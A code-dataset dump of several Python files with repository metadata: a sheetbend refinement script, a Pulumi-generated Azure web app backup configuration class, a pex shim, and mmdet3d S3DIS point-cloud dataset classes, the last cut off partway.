def sheetbend(exe, hklin, pdbin, pdbout, ncyc, logfile):
mtz_labels = mtz_util.GetLabels(hklin)
colin = "{0},{1}".format(mtz_labels.f, mtz_labels.sigf)
cmd = [exe, "--pdbin", pdbin, "--mtzin", hklin, "--pdbout", pdbout, "--colin-fo", colin, "-cycles", str(ncyc), "-resolution-by-cycle", "6,3"]
stdout = cexec(cmd)
with open(logfile, "w") as f_out:
f_out.write(stdout)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Runs refinement using sheetbend", prefix_chars="-")
group = parser.add_argument_group()
group.add_argument("-hklin", type=str, help="Path to the input hkl file")
group.add_argument("-hklout", type=str, help="Path to the output hkl file")
group.add_argument("-logfile", type=str, help="Path to the output log file")
group.add_argument("-ncyc", type=int, default=12, help="Number of cycles of refinement to run")
group.add_argument("-pdbin", type=str, help="Path to the input pdb file")
group.add_argument("-pdbout", type=str, help="Path to the output pdb file")
group.add_argument("-work_dir", type=str, help="Path to the working directory")
args = parser.parse_args()
sheetbend = SheetBend(args.hklin, args.hklout, args.logfile, args.pdbin, args.pdbout, args.work_dir)
sheetbend.run(args.ncyc)
| true
| true
|
f70b5bc19f060360f1fc41d6395e3d53e284fb88
| 8,628
|
py
|
Python
|
sdk/python/pulumi_azure_nextgen/web/web_app_backup_configuration_slot.py
|
pulumi/pulumi-azure-nextgen
|
452736b0a1cf584c2d4c04666e017af6e9b2c15c
|
[
"Apache-2.0"
] | 31
|
2020-09-21T09:41:01.000Z
|
2021-02-26T13:21:59.000Z
|
sdk/python/pulumi_azure_nextgen/web/web_app_backup_configuration_slot.py
|
pulumi/pulumi-azure-nextgen
|
452736b0a1cf584c2d4c04666e017af6e9b2c15c
|
[
"Apache-2.0"
] | 231
|
2020-09-21T09:38:45.000Z
|
2021-03-01T11:16:03.000Z
|
sdk/python/pulumi_azure_nextgen/web/web_app_backup_configuration_slot.py
|
pulumi/pulumi-azure-nextgen
|
452736b0a1cf584c2d4c04666e017af6e9b2c15c
|
[
"Apache-2.0"
] | 4
|
2020-09-29T14:14:59.000Z
|
2021-02-10T20:38:16.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from .. import _utilities, _tables
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['WebAppBackupConfigurationSlot']
class WebAppBackupConfigurationSlot(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
backup_name: Optional[pulumi.Input[str]] = None,
backup_schedule: Optional[pulumi.Input[pulumi.InputType['BackupScheduleArgs']]] = None,
databases: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DatabaseBackupSettingArgs']]]]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
kind: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
slot: Optional[pulumi.Input[str]] = None,
storage_account_url: Optional[pulumi.Input[str]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Description of a backup which will be performed.
API Version: 2020-10-01.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] backup_name: Name of the backup.
:param pulumi.Input[pulumi.InputType['BackupScheduleArgs']] backup_schedule: Schedule for the backup if it is executed periodically.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DatabaseBackupSettingArgs']]]] databases: Databases included in the backup.
:param pulumi.Input[bool] enabled: True if the backup schedule is enabled (must be included in that case), false if the backup schedule should be disabled.
:param pulumi.Input[str] kind: Kind of resource.
:param pulumi.Input[str] name: Name of the app.
:param pulumi.Input[str] resource_group_name: Name of the resource group to which the resource belongs.
:param pulumi.Input[str] slot: Name of the deployment slot. If a slot is not specified, the API will update the backup configuration for the production slot.
:param pulumi.Input[str] storage_account_url: SAS URL to the container.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['backup_name'] = backup_name
__props__['backup_schedule'] = backup_schedule
__props__['databases'] = databases
__props__['enabled'] = enabled
__props__['kind'] = kind
if name is None and not opts.urn:
raise TypeError("Missing required property 'name'")
__props__['name'] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
if slot is None and not opts.urn:
raise TypeError("Missing required property 'slot'")
__props__['slot'] = slot
if storage_account_url is None and not opts.urn:
raise TypeError("Missing required property 'storage_account_url'")
__props__['storage_account_url'] = storage_account_url
__props__['system_data'] = None
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:web/latest:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20150801:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20160801:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20180201:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20181101:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20190801:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20200601:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20200901:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20201001:WebAppBackupConfigurationSlot")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(WebAppBackupConfigurationSlot, __self__).__init__(
'azure-nextgen:web:WebAppBackupConfigurationSlot',
resource_name,
__props__,
opts)
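# Illustrative usage sketch (hypothetical names and values, not taken from
# the generated SDK; only the keyword arguments mirror the signature above):
#
#   backup = WebAppBackupConfigurationSlot(
#       "siteBackup",
#       name="my-webapp",
#       resource_group_name="my-rg",
#       slot="staging",
#       storage_account_url="https://example.blob.core.windows.net/backups?sv=...",
#       enabled=True)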
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'WebAppBackupConfigurationSlot':
"""
Get an existing WebAppBackupConfigurationSlot resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return WebAppBackupConfigurationSlot(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="backupName")
def backup_name(self) -> pulumi.Output[Optional[str]]:
"""
Name of the backup.
"""
return pulumi.get(self, "backup_name")
@property
@pulumi.getter(name="backupSchedule")
def backup_schedule(self) -> pulumi.Output[Optional['outputs.BackupScheduleResponse']]:
"""
Schedule for the backup if it is executed periodically.
"""
return pulumi.get(self, "backup_schedule")
@property
@pulumi.getter
def databases(self) -> pulumi.Output[Optional[Sequence['outputs.DatabaseBackupSettingResponse']]]:
"""
Databases included in the backup.
"""
return pulumi.get(self, "databases")
@property
@pulumi.getter
def enabled(self) -> pulumi.Output[Optional[bool]]:
"""
True if the backup schedule is enabled (must be included in that case), false if the backup schedule should be disabled.
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter
def kind(self) -> pulumi.Output[Optional[str]]:
"""
Kind of resource.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource Name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="storageAccountUrl")
def storage_account_url(self) -> pulumi.Output[str]:
"""
SAS URL to the container.
"""
return pulumi.get(self, "storage_account_url")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
"""
The system metadata relating to this resource.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type.
"""
return pulumi.get(self, "type")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 45.650794
| 779
| 0.659944
|
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from .. import _utilities, _tables
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['WebAppBackupConfigurationSlot']
class WebAppBackupConfigurationSlot(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
backup_name: Optional[pulumi.Input[str]] = None,
backup_schedule: Optional[pulumi.Input[pulumi.InputType['BackupScheduleArgs']]] = None,
databases: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DatabaseBackupSettingArgs']]]]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
kind: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
slot: Optional[pulumi.Input[str]] = None,
storage_account_url: Optional[pulumi.Input[str]] = None,
__props__=None,
__name__=None,
__opts__=None):
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['backup_name'] = backup_name
__props__['backup_schedule'] = backup_schedule
__props__['databases'] = databases
__props__['enabled'] = enabled
__props__['kind'] = kind
if name is None and not opts.urn:
raise TypeError("Missing required property 'name'")
__props__['name'] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
if slot is None and not opts.urn:
raise TypeError("Missing required property 'slot'")
__props__['slot'] = slot
if storage_account_url is None and not opts.urn:
raise TypeError("Missing required property 'storage_account_url'")
__props__['storage_account_url'] = storage_account_url
__props__['system_data'] = None
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:web/latest:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20150801:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20160801:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20180201:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20181101:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20190801:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20200601:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20200901:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20201001:WebAppBackupConfigurationSlot")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(WebAppBackupConfigurationSlot, __self__).__init__(
'azure-nextgen:web:WebAppBackupConfigurationSlot',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'WebAppBackupConfigurationSlot':
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return WebAppBackupConfigurationSlot(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="backupName")
def backup_name(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "backup_name")
@property
@pulumi.getter(name="backupSchedule")
def backup_schedule(self) -> pulumi.Output[Optional['outputs.BackupScheduleResponse']]:
return pulumi.get(self, "backup_schedule")
@property
@pulumi.getter
def databases(self) -> pulumi.Output[Optional[Sequence['outputs.DatabaseBackupSettingResponse']]]:
return pulumi.get(self, "databases")
@property
@pulumi.getter
def enabled(self) -> pulumi.Output[Optional[bool]]:
return pulumi.get(self, "enabled")
@property
@pulumi.getter
def kind(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
return pulumi.get(self, "name")
@property
@pulumi.getter(name="storageAccountUrl")
def storage_account_url(self) -> pulumi.Output[str]:
return pulumi.get(self, "storage_account_url")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
return pulumi.get(self, "type")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| true
| true
|
f70b5c717242fedb522fc7d4cd4831e8513391c1
| 67
|
py
|
Python
|
src/python/twitter/common/python/platforms.py
|
zhouyijiaren/commons
|
10df6fb63547baa9047782aa7ad4edf354914b10
|
[
"Apache-2.0"
] | 1,143
|
2015-01-05T04:19:24.000Z
|
2019-12-11T12:02:23.000Z
|
src/python/twitter/common/python/platforms.py
|
zhouyijiaren/commons
|
10df6fb63547baa9047782aa7ad4edf354914b10
|
[
"Apache-2.0"
] | 144
|
2015-01-06T05:05:07.000Z
|
2019-12-12T18:02:37.000Z
|
src/python/twitter/common/python/platforms.py
|
zhouyijiaren/commons
|
10df6fb63547baa9047782aa7ad4edf354914b10
|
[
"Apache-2.0"
] | 426
|
2015-01-08T08:33:41.000Z
|
2019-12-09T13:15:40.000Z
|
from __future__ import absolute_import
from pex.platforms import *
| 22.333333
| 38
| 0.850746
|
from __future__ import absolute_import
from pex.platforms import *
| true
| true
|
f70b5e01e475801f3975fd465b2281a400b36fda
| 18,438
|
py
|
Python
|
mmdet3d/datasets/s3dis_dataset.py
|
chence17/fcaf3d
|
636aaa0410430deedd7bd4979e8c1bc307424a84
|
[
"MIT"
] | 95
|
2021-12-01T07:32:48.000Z
|
2022-03-11T07:12:32.000Z
|
mmdet3d/datasets/s3dis_dataset.py
|
chence17/fcaf3d
|
636aaa0410430deedd7bd4979e8c1bc307424a84
|
[
"MIT"
] | 15
|
2021-12-03T09:56:17.000Z
|
2022-03-07T13:01:12.000Z
|
mmdet3d/datasets/s3dis_dataset.py
|
chence17/fcaf3d
|
636aaa0410430deedd7bd4979e8c1bc307424a84
|
[
"MIT"
] | 21
|
2021-12-02T11:07:55.000Z
|
2022-03-28T15:25:02.000Z
|
import numpy as np
from os import path as osp
from mmdet3d.core import show_result, show_seg_result
from mmdet3d.core.bbox import DepthInstance3DBoxes
from mmdet.datasets import DATASETS
from mmseg.datasets import DATASETS as SEG_DATASETS
from .custom_3d import Custom3DDataset
from .custom_3d_seg import Custom3DSegDataset
from .pipelines import Compose
@DATASETS.register_module()
class S3DISDataset(Custom3DDataset):
"""S3DIS Dataset for Detection Task.
This class is the inner dataset for S3DIS. Since S3DIS has 6 areas, we
often train on 5 of them and test on the remaining one. The one for
test is Area_5 as suggested in `GSDN <https://arxiv.org/abs/2006.12356>`_.
To concatenate 5 areas during training
`mmdet.datasets.dataset_wrappers.ConcatDataset` should be used.
Args:
data_root (str): Path of dataset root.
ann_file (str): Path of annotation file.
pipeline (list[dict], optional): Pipeline used for data processing.
Defaults to None.
classes (tuple[str], optional): Classes used in the dataset.
Defaults to None.
modality (dict, optional): Modality to specify the sensor data used
as input. Defaults to None.
box_type_3d (str, optional): Type of 3D box of this dataset.
Based on the `box_type_3d`, the dataset will encapsulate the box
in its original format and then convert it to `box_type_3d`.
Defaults to 'Depth' in this dataset. Available options include
- 'LiDAR': Box in LiDAR coordinates.
- 'Depth': Box in depth coordinates, usually for indoor dataset.
- 'Camera': Box in camera coordinates.
filter_empty_gt (bool, optional): Whether to filter empty GT.
Defaults to True.
test_mode (bool, optional): Whether the dataset is in test mode.
Defaults to False.
"""
CLASSES = ('table', 'chair', 'sofa', 'bookcase', 'board')
def __init__(self,
data_root,
ann_file,
pipeline=None,
classes=None,
modality=None,
box_type_3d='Depth',
filter_empty_gt=True,
test_mode=False):
super().__init__(
data_root=data_root,
ann_file=ann_file,
pipeline=pipeline,
classes=classes,
modality=modality,
box_type_3d=box_type_3d,
filter_empty_gt=filter_empty_gt,
test_mode=test_mode)
def get_ann_info(self, index):
"""Get annotation info according to the given index.
Args:
index (int): Index of the annotation data to get.
Returns:
dict: annotation information consists of the following keys:
- gt_bboxes_3d (:obj:`DepthInstance3DBoxes`): \
3D ground truth bboxes
- gt_labels_3d (np.ndarray): Labels of ground truths.
- pts_instance_mask_path (str): Path of instance masks.
- pts_semantic_mask_path (str): Path of semantic masks.
"""
# Use index to get the annos, thus the evalhook could also use this api
info = self.data_infos[index]
if info['annos']['gt_num'] != 0:
gt_bboxes_3d = info['annos']['gt_boxes_upright_depth'].astype(
np.float32) # k, 6
gt_labels_3d = info['annos']['class'].astype(np.long)
else:
gt_bboxes_3d = np.zeros((0, 6), dtype=np.float32)
gt_labels_3d = np.zeros((0, ), dtype=np.long)
# to target box structure
gt_bboxes_3d = DepthInstance3DBoxes(
gt_bboxes_3d,
box_dim=gt_bboxes_3d.shape[-1],
with_yaw=False,
origin=(0.5, 0.5, 0.5)).convert_to(self.box_mode_3d)
pts_instance_mask_path = osp.join(self.data_root,
info['pts_instance_mask_path'])
pts_semantic_mask_path = osp.join(self.data_root,
info['pts_semantic_mask_path'])
anns_results = dict(
gt_bboxes_3d=gt_bboxes_3d,
gt_labels_3d=gt_labels_3d,
pts_instance_mask_path=pts_instance_mask_path,
pts_semantic_mask_path=pts_semantic_mask_path)
return anns_results
def get_data_info(self, index):
"""Get data info according to the given index.
Args:
index (int): Index of the sample data to get.
Returns:
dict: Data information that will be passed to the data \
preprocessing pipelines. It includes the following keys:
- pts_filename (str): Filename of point clouds.
- file_name (str): Filename of point clouds.
- ann_info (dict): Annotation info.
"""
info = self.data_infos[index]
pts_filename = osp.join(self.data_root, info['pts_path'])
input_dict = dict(pts_filename=pts_filename)
if not self.test_mode:
annos = self.get_ann_info(index)
input_dict['ann_info'] = annos
if self.filter_empty_gt and ~(annos['gt_labels_3d'] != -1).any():
return None
return input_dict
def _build_default_pipeline(self):
"""Build the default pipeline for this dataset."""
pipeline = [
dict(
type='LoadPointsFromFile',
coord_type='DEPTH',
shift_height=False,
load_dim=6,
use_dim=[0, 1, 2, 3, 4, 5]),
dict(
type='DefaultFormatBundle3D',
class_names=self.CLASSES,
with_label=False),
dict(type='Collect3D', keys=['points'])
]
return Compose(pipeline)
def show(self, results, out_dir, show=True, pipeline=None):
"""Results visualization.
Args:
results (list[dict]): List of bounding boxes results.
out_dir (str): Output directory of visualization result.
show (bool): Visualize the results online.
pipeline (list[dict], optional): raw data loading for showing.
Default: None.
"""
assert out_dir is not None, 'Expect out_dir, got none.'
pipeline = self._get_pipeline(pipeline)
for i, result in enumerate(results):
data_info = self.data_infos[i]
pts_path = data_info['pts_path']
file_name = osp.split(pts_path)[-1].split('.')[0]
points = self._extract_data(i, pipeline, 'points').numpy()
gt_bboxes = self.get_ann_info(i)['gt_bboxes_3d']
gt_bboxes = gt_bboxes.corners.numpy() if len(gt_bboxes) else None
gt_labels = self.get_ann_info(i)['gt_labels_3d']
pred_bboxes = result['boxes_3d']
pred_bboxes = pred_bboxes.corners.numpy() if len(pred_bboxes) else None
pred_labels = result['labels_3d']
show_result(points, gt_bboxes, gt_labels,
pred_bboxes, pred_labels, out_dir, file_name, False)
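# Illustrative config sketch (an assumption following common mmdet3d usage;
# the paths and the pipeline name are hypothetical):
#
#   dataset = S3DISDataset(
#       data_root='data/s3dis/',
#       ann_file='data/s3dis/s3dis_infos_Area_1.pkl',
#       pipeline=train_pipeline)
#
# Training on 5 areas is then done by wrapping several such datasets with
# mmdet.datasets.dataset_wrappers.ConcatDataset, as noted in the class
# docstring.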
class _S3DISSegDataset(Custom3DSegDataset):
r"""S3DIS Dataset for Semantic Segmentation Task.
This class is the inner dataset for S3DIS. Since S3DIS has 6 areas, we
often train on 5 of them and test on the remaining one.
However, there is not a fixed train-test split of S3DIS. People often test
on Area_5 as suggested by `SEGCloud <https://arxiv.org/abs/1710.07563>`_.
But many papers also report the average results of 6-fold cross validation
over the 6 areas (e.g. `DGCNN <https://arxiv.org/abs/1801.07829>`_).
Therefore, we use an inner dataset for one area, and further use a dataset
wrapper to concat all the provided data in different areas.
Args:
data_root (str): Path of dataset root.
ann_file (str): Path of annotation file.
pipeline (list[dict], optional): Pipeline used for data processing.
Defaults to None.
classes (tuple[str], optional): Classes used in the dataset.
Defaults to None.
palette (list[list[int]], optional): The palette of segmentation map.
Defaults to None.
modality (dict, optional): Modality to specify the sensor data used
as input. Defaults to None.
test_mode (bool, optional): Whether the dataset is in test mode.
Defaults to False.
ignore_index (int, optional): The label index to be ignored, e.g. \
unannotated points. If None is given, set to len(self.CLASSES).
Defaults to None.
scene_idxs (np.ndarray | str, optional): Precomputed index to load
data. For scenes with many points, we may sample it several times.
Defaults to None.
"""
CLASSES = ('ceiling', 'floor', 'wall', 'beam', 'column', 'window', 'door',
'table', 'chair', 'sofa', 'bookcase', 'board', 'clutter')
VALID_CLASS_IDS = tuple(range(13))
ALL_CLASS_IDS = tuple(range(14)) # possibly with 'stair' class
PALETTE = [[0, 255, 0], [0, 0, 255], [0, 255, 255], [255, 255, 0],
[255, 0, 255], [100, 100, 255], [200, 200, 100],
[170, 120, 200], [255, 0, 0], [200, 100, 100], [10, 200, 100],
[200, 200, 200], [50, 50, 50]]
def __init__(self,
data_root,
ann_file,
pipeline=None,
classes=None,
palette=None,
modality=None,
test_mode=False,
ignore_index=None,
scene_idxs=None):
super().__init__(
data_root=data_root,
ann_file=ann_file,
pipeline=pipeline,
classes=classes,
palette=palette,
modality=modality,
test_mode=test_mode,
ignore_index=ignore_index,
scene_idxs=scene_idxs)
def get_ann_info(self, index):
"""Get annotation info according to the given index.
Args:
index (int): Index of the annotation data to get.
Returns:
dict: annotation information consists of the following keys:
- pts_semantic_mask_path (str): Path of semantic masks.
"""
# Use index to get the annos, thus the evalhook could also use this api
info = self.data_infos[index]
pts_semantic_mask_path = osp.join(self.data_root,
info['pts_semantic_mask_path'])
anns_results = dict(pts_semantic_mask_path=pts_semantic_mask_path)
return anns_results
def _build_default_pipeline(self):
"""Build the default pipeline for this dataset."""
pipeline = [
dict(
type='LoadPointsFromFile',
coord_type='DEPTH',
shift_height=False,
use_color=True,
load_dim=6,
use_dim=[0, 1, 2, 3, 4, 5]),
dict(
type='LoadAnnotations3D',
with_bbox_3d=False,
with_label_3d=False,
with_mask_3d=False,
with_seg_3d=True),
dict(
type='PointSegClassMapping',
valid_cat_ids=self.VALID_CLASS_IDS,
max_cat_id=np.max(self.ALL_CLASS_IDS)),
dict(
type='DefaultFormatBundle3D',
with_label=False,
class_names=self.CLASSES),
dict(type='Collect3D', keys=['points', 'pts_semantic_mask'])
]
return Compose(pipeline)
def show(self, results, out_dir, show=True, pipeline=None):
"""Results visualization.
Args:
results (list[dict]): List of bounding boxes results.
out_dir (str): Output directory of visualization result.
show (bool): Visualize the results online.
pipeline (list[dict], optional): raw data loading for showing.
Default: None.
"""
assert out_dir is not None, 'Expect out_dir, got none.'
pipeline = self._get_pipeline(pipeline)
for i, result in enumerate(results):
data_info = self.data_infos[i]
pts_path = data_info['pts_path']
file_name = osp.split(pts_path)[-1].split('.')[0]
points, gt_sem_mask = self._extract_data(
i, pipeline, ['points', 'pts_semantic_mask'], load_annos=True)
points = points.numpy()
pred_sem_mask = result['semantic_mask'].numpy()
show_seg_result(points, gt_sem_mask,
pred_sem_mask, out_dir, file_name,
np.array(self.PALETTE), self.ignore_index, show)
def get_scene_idxs(self, scene_idxs):
"""Compute scene_idxs for data sampling.
We sample more times for scenes with more points.
"""
# when testing, we load one whole scene every time
if not self.test_mode and scene_idxs is None:
raise NotImplementedError(
'please provide re-sampled scene indexes for training')
return super().get_scene_idxs(scene_idxs)
@DATASETS.register_module()
@SEG_DATASETS.register_module()
class S3DISSegDataset(_S3DISSegDataset):
r"""S3DIS Dataset for Semantic Segmentation Task.
This class serves as the API for experiments on the S3DIS Dataset.
It wraps the provided datasets of different areas.
We don't use `mmdet.datasets.dataset_wrappers.ConcatDataset` because we
need to concat the `scene_idxs` of different areas.
Please refer to the `google form <https://docs.google.com/forms/d/e/1FAIpQL
ScDimvNMCGhy_rmBA2gHfDu3naktRm6A8BPwAWWDv-Uhm6Shw/viewform?c=0&w=1>`_ for
data downloading.
Args:
data_root (str): Path of dataset root.
ann_files (list[str]): Path of several annotation files.
pipeline (list[dict], optional): Pipeline used for data processing.
Defaults to None.
classes (tuple[str], optional): Classes used in the dataset.
Defaults to None.
palette (list[list[int]], optional): The palette of segmentation map.
Defaults to None.
modality (dict, optional): Modality to specify the sensor data used
as input. Defaults to None.
test_mode (bool, optional): Whether the dataset is in test mode.
Defaults to False.
ignore_index (int, optional): The label index to be ignored, e.g. \
unannotated points. If None is given, set to len(self.CLASSES).
Defaults to None.
scene_idxs (list[np.ndarray] | list[str], optional): Precomputed index
to load data. For scenes with many points, we may sample it several
times. Defaults to None.
"""
def __init__(self,
data_root,
ann_files,
pipeline=None,
classes=None,
palette=None,
modality=None,
test_mode=False,
ignore_index=None,
scene_idxs=None):
# make sure that ann_files and scene_idxs have same length
ann_files = self._check_ann_files(ann_files)
scene_idxs = self._check_scene_idxs(scene_idxs, len(ann_files))
# initialize some attributes as datasets[0]
super().__init__(
data_root=data_root,
ann_file=ann_files[0],
pipeline=pipeline,
classes=classes,
palette=palette,
modality=modality,
test_mode=test_mode,
ignore_index=ignore_index,
scene_idxs=scene_idxs[0])
datasets = [
_S3DISSegDataset(
data_root=data_root,
ann_file=ann_files[i],
pipeline=pipeline,
classes=classes,
palette=palette,
modality=modality,
test_mode=test_mode,
ignore_index=ignore_index,
scene_idxs=scene_idxs[i]) for i in range(len(ann_files))
]
# data_infos and scene_idxs need to be concat
self.concat_data_infos([dst.data_infos for dst in datasets])
self.concat_scene_idxs([dst.scene_idxs for dst in datasets])
# set group flag for the sampler
if not self.test_mode:
self._set_group_flag()
def concat_data_infos(self, data_infos):
"""Concat data_infos from several datasets to form self.data_infos.
Args:
data_infos (list[list[dict]])
"""
self.data_infos = [
info for one_data_infos in data_infos for info in one_data_infos
]
def concat_scene_idxs(self, scene_idxs):
"""Concat scene_idxs from several datasets to form self.scene_idxs.
Needs to manually add offset to scene_idxs[1, 2, ...].
Args:
scene_idxs (list[np.ndarray])
"""
self.scene_idxs = np.array([], dtype=np.int32)
offset = 0
for one_scene_idxs in scene_idxs:
self.scene_idxs = np.concatenate(
[self.scene_idxs, one_scene_idxs + offset]).astype(np.int32)
offset = np.unique(self.scene_idxs).max() + 1
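# Worked example of the offset bookkeeping above (illustrative only): with
# scene_idxs = [np.array([0, 0, 1]), np.array([0, 1, 1])] the first area
# contributes [0, 0, 1]; the offset then becomes unique(...).max() + 1 = 2,
# so the second area is shifted to [2, 3, 3] and the concatenated result is
# [0, 0, 1, 2, 3, 3].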
@staticmethod
def _duplicate_to_list(x, num):
"""Repeat x `num` times to form a list."""
return [x for _ in range(num)]
def _check_ann_files(self, ann_file):
"""Make ann_files as list/tuple."""
# ann_file could be str
if not isinstance(ann_file, (list, tuple)):
ann_file = self._duplicate_to_list(ann_file, 1)
return ann_file
def _check_scene_idxs(self, scene_idx, num):
"""Make scene_idxs as list/tuple."""
if scene_idx is None:
return self._duplicate_to_list(scene_idx, num)
# scene_idx could be str, np.ndarray, list or tuple
if isinstance(scene_idx, str): # str
return self._duplicate_to_list(scene_idx, num)
if isinstance(scene_idx[0], str): # list of str
return scene_idx
if isinstance(scene_idx[0], (list, tuple, np.ndarray)): # list of idx
return scene_idx
# single idx
return self._duplicate_to_list(scene_idx, num)
| 39.822894
| 83
| 0.594533
|
import numpy as np
from os import path as osp
from mmdet3d.core import show_result, show_seg_result
from mmdet3d.core.bbox import DepthInstance3DBoxes
from mmdet.datasets import DATASETS
from mmseg.datasets import DATASETS as SEG_DATASETS
from .custom_3d import Custom3DDataset
from .custom_3d_seg import Custom3DSegDataset
from .pipelines import Compose
@DATASETS.register_module()
class S3DISDataset(Custom3DDataset):
CLASSES = ('table', 'chair', 'sofa', 'bookcase', 'board')
def __init__(self,
data_root,
ann_file,
pipeline=None,
classes=None,
modality=None,
box_type_3d='Depth',
filter_empty_gt=True,
test_mode=False):
super().__init__(
data_root=data_root,
ann_file=ann_file,
pipeline=pipeline,
classes=classes,
modality=modality,
box_type_3d=box_type_3d,
filter_empty_gt=filter_empty_gt,
test_mode=test_mode)
def get_ann_info(self, index):
info = self.data_infos[index]
if info['annos']['gt_num'] != 0:
gt_bboxes_3d = info['annos']['gt_boxes_upright_depth'].astype(
np.float32)
gt_labels_3d = info['annos']['class'].astype(np.long)
else:
gt_bboxes_3d = np.zeros((0, 6), dtype=np.float32)
gt_labels_3d = np.zeros((0, ), dtype=np.long)
